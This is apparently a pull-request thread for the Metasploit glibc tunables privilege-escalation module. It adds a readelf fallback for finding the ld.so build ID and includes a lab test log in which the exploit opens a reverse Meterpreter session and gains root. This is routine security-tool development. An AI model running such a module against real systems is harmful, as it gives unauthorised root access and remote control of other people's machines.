Improve a bit glibc_tunables_priv_esc

[jvoisin]

• Fix some typos
• Add a check via readelf should file not be available
• Add a message before launching the exploit, since it might take some time to finish.

I didn't bother adding the elfutils method, since odds are it's not installed on production systems.

[sempervictus]

Looks sane at first glance, thanks boss

[jheysel-r7]

Thanks for the improvement @jvoisin! Much appreciated. I installed binutils + readelf on Ubuntu and commented out the file code path to ensure the new additions were executed. Everything worked without issue:

msf6 exploit(linux/local/glibc_tunables_priv_esc) > run

[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Sending stage (3045380 bytes) to 192.168.123.228
[*] Meterpreter session 3 opened (192.168.123.1:5555 -> 192.168.123.228:51828) at 2023-12-28 12:31:08 -0500

meterpreter > getuid
Server username: root
meterpreter >

[jheysel-r7]

Release Notes

This PR adds improvements to the glibc tunables privilege escalation module. In the event the file command is not present on the target the module will try to use the readelf command in order to get the ld.so build ID to determine whether or not the target is compatible with exploit.